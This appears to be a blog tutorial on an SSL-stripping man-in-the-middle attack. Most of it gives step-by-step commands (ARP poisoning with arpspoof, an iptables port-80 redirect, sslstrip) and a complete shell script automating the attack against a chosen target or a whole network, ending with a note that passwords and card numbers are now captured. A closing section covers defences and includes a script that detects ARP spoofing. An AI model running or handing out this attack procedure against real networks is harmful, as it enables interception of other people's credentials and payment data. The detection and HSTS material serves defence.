How does this work?
First, arpspoof tricks the target into believing that our machine is the router (and, if you poison both directions, tricks the router into believing that we are the target). This lets us receive all the traffic the target sends towards the router, and from there we can modify anything we receive. Of that traffic, only the part destined for port 80 (HTTP) is handed to SSL Strip; everything else is simply forwarded on to the real router. SSL Strip watches the HTTP pages it relays for HTTPS links and redirects and rewrites them into look-alike HTTP links or homograph-similar HTTPS links, while it fetches the real page over HTTPS itself. The browser never sees the upgrade to HTTPS, so the session stays in plain text and passwords and other sensitive data submitted over it are easy to read. The precondition is that the session starts over plain HTTP (for example the user types a bare hostname and the site redirects to HTTPS); a page the browser already requests over HTTPS cannot be stripped.
Instructions:
1. First off, make sure you have Python and Twisted Web installed. You will also need the dsniff suite, which provides arpspoof:
sudo apt-get install python
sudo apt-get install python-twisted
sudo apt-get install dsniff
2. Once those dependencies are installed, make sure IP forwarding is enabled; otherwise the target's traffic stops at your machine instead of reaching the router and the target simply loses its connection:
echo 1 > /proc/sys/net/ipv4/ip_forward
(Run this from a root shell. "sudo echo 1 > ..." does not work, because the redirection is done by your unprivileged shell; use "echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward" instead.)
3. Now redirect the port 80 (HTTP) traffic that passes through your machine to the port SSL Strip will listen on. Where it says <listenPort>, type any free port, for example 1000. Everything that is not port 80 is left alone and is just forwarded:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
4. Download SSL Strip from Moxie Marlinspike's website (he is the awesome guy who created it). Once it's downloaded, change into the directory it unpacked to and install it by typing sudo python setup.py install into your CLI (Command Line Interface). Make sure you are in the correct directory.
cd /Whatever/Directory/SSLStrip/is/In
sudo python setup.py install
5. Lastly, you need to tell the target (or every computer on the network) that the router's IP address belongs to your machine. Where it says <interface> put your wireless card, where it says <targetIP> put the target's IP, and where it says <gatewayIP> put the gateway's IP (usually 192.168.1.1 or 192.168.0.1). If you want to target the entire network, leave out -t and use the third command.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
e.g. arpspoof -i wlan0 -t 192.168.1.199 192.168.1.1
arpspoof -i <interface> <gatewayIP>
Note that this poisons only the target's ARP cache, so only the target's outgoing traffic comes to you. That is all SSL Strip needs, because it fetches the real pages itself, but if you also want to see the router's replies, run a second arpspoof with the two addresses swapped (e.g. arpspoof -i wlan0 -t 192.168.1.1 192.168.1.199), or use the -r option on recent dsniff builds. When you are done, stop arpspoof with Ctrl-C rather than killing it, so it can send the real MAC addresses back to the hosts it poisoned.
Finally, start SSL Strip on the port you chose in step 3 (it writes what it captures to sslstrip.log in the current directory):
sslstrip -l <listenPort>
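Here is the whole procedure wired into one script, added as an example for this post (it is not part of the original write-up or of the dsniff/sslstrip projects). It assumes the interface, the two IP addresses and the listen port are passed on the command line, that the tools from steps 1 and 4 are installed, and that it runs as root; the function names valid_ipv4, valid_port, nat_redirect, cleanup and run_lab are my own. The point it adds to the steps above is the teardown: the NAT rule, the ip_forward setting and arpspoof are all undone when you press Ctrl-C, so you do not leave the network in a broken state.

```shell
#!/bin/sh
# Added example (not from the original post): steps 2, 3 and 5 of the tutorial
# as one script with input validation and cleanup on exit.
# Assumptions: arguments are <iface> <targetIP> <gatewayIP> <listenPort>,
# e.g. "run wlan0 192.168.1.199 192.168.1.1 1000"; arpspoof (dsniff),
# sslstrip and iptables are installed; the script is run as root.

# True if $1 is a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
    case "$1" in ''|*[!0-9.]*|.*|*.|*..*) return 1 ;; esac
    ip_old_ifs=$IFS; IFS=.; set -- $1; IFS=$ip_old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# True if $1 is a usable TCP port number (1..65535).
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Step 3: add (-A) or delete (-D) the NAT rule that hands port-80 traffic
# passing through this box to sslstrip's listener on port $2.
nat_redirect() {
    iptables -t nat "$1" PREROUTING -p tcp --destination-port 80 \
        -j REDIRECT --to-port "$2"
}

# Undo everything: stop arpspoof (it re-ARPs the victims on a clean exit),
# drop the redirect rule and restore the original ip_forward value.
cleanup() {
    [ -n "${spoof_pid:-}" ] && kill -INT "$spoof_pid" 2>/dev/null
    nat_redirect -D "$port" 2>/dev/null
    echo "$saved_forward" > /proc/sys/net/ipv4/ip_forward
}

run_lab() {
    iface=$1; target=$2; gateway=$3; port=$4
    valid_ipv4 "$target" && valid_ipv4 "$gateway" && valid_port "$port" || {
        echo "usage: $0 run <iface> <targetIP> <gatewayIP> <listenPort>" >&2
        return 2
    }
    [ "$(id -u)" -eq 0 ] || { echo "must run as root" >&2; return 2; }

    saved_forward=$(cat /proc/sys/net/ipv4/ip_forward)
    trap cleanup EXIT INT TERM
    echo 1 > /proc/sys/net/ipv4/ip_forward     # step 2
    nat_redirect -A "$port"                     # step 3

    # Step 5: poison the target's ARP cache so <gatewayIP> resolves to our MAC.
    # Add a second instance with the two addresses swapped to poison the
    # gateway as well (or use -r on recent dsniff builds).
    arpspoof -i "$iface" -t "$target" "$gateway" >/dev/null 2>&1 &
    spoof_pid=$!

    # sslstrip listens on the redirected port and logs what it strips.
    sslstrip -l "$port" -w sslstrip.log
}

if [ "${1:-}" = run ]; then
    shift
    run_lab "$@"
fi
```

Run it as "sudo sh sslstrip-lab.sh run wlan0 192.168.1.199 192.168.1.1 1000" and stop it with Ctrl-C; the trap then runs cleanup even if sslstrip crashes.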
Congratulations: every packet from the target now passes through your computer, and SSL Strip records the passwords, credit card numbers and other sensitive information in the sessions it downgrades. Always remember though:
With great power, comes great responsibility
How do you prevent this sort of attack?
There are a couple of options. The easiest is to use a VPN: the attacker still sees your packets, but they are encrypted and all addressed to the VPN server, so there is no HTTP on the local network to strip. If you don't want to do that, you can use HTTPS Everywhere, which rewrites requests to HTTPS for the sites in its ruleset, so those sites never make the plain HTTP request SSL Strip needs to see; it does not cover sites outside its list, so it is weaker than a VPN. The fix that works everywhere is on the server side: a site that sends an HSTS header (and, better, is on the browser's preload list) tells the browser never to use plain HTTP for it, which defeats SSL Strip on every later visit. It is also worth noticing the attack itself: the gateway's MAC address suddenly changing, or one MAC address answering for two IP addresses, is the signature of arpspoof.
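As an added example for the defensive side (not from the original post): a small check a client can run to notice step 5 happening to it. The neighbour table, the MAC addresses and the pinned gateway MAC below are constructed sample data; the function names duplicate_macs, gateway_mac and check_gateway are my own, and the only real interface it relies on is the line format of "ip neigh show" (IP, "dev", interface, "lladdr", MAC, state).

```shell
#!/bin/sh
# Added example (not from the original post): detect arpspoof from the victim.
# Reads a neighbour table in `ip neigh show` format on stdin and reports
# (a) any MAC address claimed by more than one IP address and
# (b) a gateway whose MAC no longer matches a value pinned earlier.

# Print each MAC that appears for two or more IPs, followed by those IPs.
# After arpspoof, the attacker's MAC answers for its own IP and the gateway's.
duplicate_macs() {
    awk '$2 == "dev" && $4 == "lladdr" { seen[$5] = seen[$5] " " $1; n[$5]++ }
         END { for (m in n) if (n[m] > 1) print m ":" seen[m] }' | sort
}

# Print the MAC the table currently holds for gateway IP $1 (empty if none).
gateway_mac() {
    awk -v gw="$1" '$1 == gw && $4 == "lladdr" { print $5; exit }'
}

# check_gateway <gatewayIP> <pinnedMAC>  (table on stdin)
# Returns 0 when the live MAC matches the pinned one, 1 when it has "moved".
check_gateway() {
    live=$(gateway_mac "$1")
    [ -n "$live" ] && [ "$live" = "$2" ]
}

# Constructed sample of a poisoned victim's table: 192.168.1.50 is the
# attacker, 192.168.1.1 the gateway; both now resolve to the attacker's MAC.
SAMPLE_TABLE='192.168.1.1 dev wlan0 lladdr 02:11:22:33:44:55 REACHABLE
192.168.1.50 dev wlan0 lladdr 02:11:22:33:44:55 STALE
192.168.1.20 dev wlan0 lladdr 02:aa:bb:cc:dd:ee REACHABLE
192.168.1.77 dev wlan0  FAILED'
# MAC recorded for the gateway while the network was known-good (constructed).
PINNED_GATEWAY_MAC=02:de:ad:be:ef:01

# Demo run against the sample. On a real host replace the sample with
#   ip neigh show | duplicate_macs
# and pin the gateway MAC from a trusted moment (e.g. a wired connection).
printf '%s\n' "$SAMPLE_TABLE" | duplicate_macs
if printf '%s\n' "$SAMPLE_TABLE" | check_gateway 192.168.1.1 "$PINNED_GATEWAY_MAC"; then
    echo "gateway MAC matches pinned value"
else
    echo "WARNING: gateway 192.168.1.1 MAC changed; possible ARP spoofing"
fi
```

Run it periodically (cron, or a loop) and alert on either finding; on a home router the gateway MAC should never change while you are connected.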
Thanks for reading and if you have any questions or tips (or just want to say thanks), let me know in the comments!